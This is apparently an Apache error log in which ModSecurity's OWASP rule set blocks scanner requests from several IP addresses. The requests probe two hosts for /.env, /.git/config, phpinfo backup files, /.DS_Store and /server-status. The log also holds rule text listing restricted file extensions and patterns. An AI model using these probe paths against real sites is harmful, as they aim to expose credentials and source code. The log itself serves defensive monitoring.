[Tue Nov 18 14:52:30.552882 2025] [:error] [pid 160239] [client 34.235.129.146:57994] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRx6Hu1NcONF8naoxQFfBAAAAAw"]
[Tue Nov 18 14:52:30.553039 2025] [:error] [pid 160239] [client 34.235.129.146:57994] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRx6Hu1NcONF8naoxQFfBAAAAAw"]
[Tue Nov 18 14:52:30.658017 2025] [authz_core:error] [pid 160881] [client 34.235.129.146:58180] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Tue Nov 18 14:52:30.700523 2025] [:error] [pid 160906] [client 34.235.129.146:58230] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRx6Hv7FUeIdxVPAs5igygAAAAY"]
[Tue Nov 18 14:52:30.700839 2025] [:error] [pid 160906] [client 34.235.129.146:58230] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRx6Hv7FUeIdxVPAs5igygAAAAY"]
[Tue Nov 18 14:52:30.700984 2025] [:error] [pid 160906] [client 34.235.129.146:58230] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRx6Hv7FUeIdxVPAs5igygAAAAY"]
[Tue Nov 18 14:52:36.484246 2025] [:error] [pid 160881] [client 34.235.129.146:34044] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRx6JMKvHpCFfzvQgqZe2AAAAAQ"]
[Tue Nov 18 14:52:36.484483 2025] [:error] [pid 160881] [client 34.235.129.146:34044] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRx6JMKvHpCFfzvQgqZe2AAAAAQ"]
[Tue Nov 18 14:52:36.484707 2025] [:error] [pid 160881] [client 34.235.129.146:34044] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRx6JMKvHpCFfzvQgqZe2AAAAAQ"]
[Wed Nov 19 18:24:23.231042 2025] [:error] [pid 185272] [client 45.148.10.246:42882] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aR39R5DJD4OyeV6m9hmoTgAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/.git/refs/heads/master
[Wed Nov 19 18:24:23.231354 2025] [:error] [pid 185272] [client 45.148.10.246:42882] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aR39R5DJD4OyeV6m9hmoTgAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/.git/refs/heads/master
[Wed Nov 19 18:24:23.231560 2025] [:error] [pid 185272] [client 45.148.10.246:42882] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aR39R5DJD4OyeV6m9hmoTgAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/.git/refs/heads/master
[Thu Nov 20 06:49:48.907343 2025] [:error] [pid 202060] [client 45.148.10.152:43830] [client 45.148.10.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR6r_HKrPyMVmNJcOn2PAgAAAAQ"]
[Thu Nov 20 06:49:48.907664 2025] [:error] [pid 202060] [client 45.148.10.152:43830] [client 45.148.10.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR6r_HKrPyMVmNJcOn2PAgAAAAQ"]
[Thu Nov 20 06:49:48.907833 2025] [:error] [pid 202060] [client 45.148.10.152:43830] [client 45.148.10.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR6r_HKrPyMVmNJcOn2PAgAAAAQ"]
[Thu Nov 20 19:21:04.318466 2025] [:error] [pid 216420] [client 195.85.115.22:47160] [client 195.85.115.22] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR9cEOxtvIphkADkaA-QUgAAAAE"]
[Thu Nov 20 19:21:04.318874 2025] [:error] [pid 216420] [client 195.85.115.22:47160] [client 195.85.115.22] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR9cEOxtvIphkADkaA-QUgAAAAE"]
[Thu Nov 20 19:21:04.319060 2025] [:error] [pid 216420] [client 195.85.115.22:47160] [client 195.85.115.22] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR9cEOxtvIphkADkaA-QUgAAAAE"]
[Thu Nov 20 21:20:33.917276 2025] [:error] [pid 202075] [client 93.123.109.7:41870] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR94EVURufz5LUjYkjB6sQAAAAs"]
[Thu Nov 20 21:20:33.917601 2025] [:error] [pid 202075] [client 93.123.109.7:41870] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR94EVURufz5LUjYkjB6sQAAAAs"]
[Thu Nov 20 21:20:33.917765 2025] [:error] [pid 202075] [client 93.123.109.7:41870] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR94EVURufz5LUjYkjB6sQAAAAs"]
[Thu Nov 20 21:20:34.240807 2025] [:error] [pid 202061] [client 93.123.109.7:41876] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR94EqHzth2MlIaMHUzebAAAAAU"]
[Thu Nov 20 21:20:34.241068 2025] [:error] [pid 202061] [client 93.123.109.7:41876] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR94EqHzth2MlIaMHUzebAAAAAU"]
[Thu Nov 20 21:20:34.241268 2025] [:error] [pid 202061] [client 93.123.109.7:41876] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR94EqHzth2MlIaMHUzebAAAAAU"]
[Fri Nov 21 01:46:52.033590 2025] [authz_core:error] [pid 222917] [client 167.71.81.114:59566] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 21 01:46:53.003106 2025] [:error] [pid 221485] [client 167.71.81.114:59594] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR-2faONvfOn2z8V863XAQAAAAQ"]
[Fri Nov 21 01:46:53.003426 2025] [:error] [pid 221485] [client 167.71.81.114:59594] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR-2faONvfOn2z8V863XAQAAAAQ"]
[Fri Nov 21 01:46:53.003597 2025] [:error] [pid 221485] [client 167.71.81.114:59594] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR-2faONvfOn2z8V863XAQAAAAQ"]
[Fri Nov 21 01:46:53.319054 2025] [:error] [pid 222918] [client 167.71.81.114:59596] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR-2fY0u624LVB85kU4wEgAAAAg"]
[Fri Nov 21 01:46:53.319320 2025] [:error] [pid 222918] [client 167.71.81.114:59596] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR-2fY0u624LVB85kU4wEgAAAAg"]
[Fri Nov 21 01:46:53.319498 2025] [:error] [pid 222918] [client 167.71.81.114:59596] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR-2fY0u624LVB85kU4wEgAAAAg"]
[Fri Nov 21 01:46:53.668798 2025] [:error] [pid 221487] [client 167.71.81.114:59600] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR-2fSoCj53PjusTNCx9HQAAAAY"]
[Fri Nov 21 01:46:53.669042 2025] [:error] [pid 221487] [client 167.71.81.114:59600] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR-2fSoCj53PjusTNCx9HQAAAAY"]
[Fri Nov 21 01:46:53.669205 2025] [:error] [pid 221487] [client 167.71.81.114:59600] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR-2fSoCj53PjusTNCx9HQAAAAY"]
[Fri Nov 21 04:32:42.594658 2025] [authz_core:error] [pid 223954] [client 207.154.197.113:56650] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 21 04:32:43.730334 2025] [:error] [pid 224157] [client 207.154.197.113:56694] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aR_dWxwVZ0k-ldSnL4rj2gAAAAY"]
[Fri Nov 21 04:32:43.730584 2025] [:error] [pid 224157] [client 207.154.197.113:56694] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aR_dWxwVZ0k-ldSnL4rj2gAAAAY"]
[Fri Nov 21 04:32:43.730767 2025] [:error] [pid 224157] [client 207.154.197.113:56694] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aR_dWxwVZ0k-ldSnL4rj2gAAAAY"]
[Fri Nov 21 04:32:44.547738 2025] [:error] [pid 224162] [client 207.154.197.113:56700] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR_dXE_9oHP6AInZ0COzAQAAAAo"]
[Fri Nov 21 04:32:44.547959 2025] [:error] [pid 224162] [client 207.154.197.113:56700] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR_dXE_9oHP6AInZ0COzAQAAAAo"]
[Fri Nov 21 04:32:44.548131 2025] [:error] [pid 224162] [client 207.154.197.113:56700] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aR_dXE_9oHP6AInZ0COzAQAAAAo"]
[Fri Nov 21 04:32:44.964198 2025] [:error] [pid 223952] [client 207.154.197.113:56716] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR_dXJIgILTHWk6gdY_zJgAAAAA"]
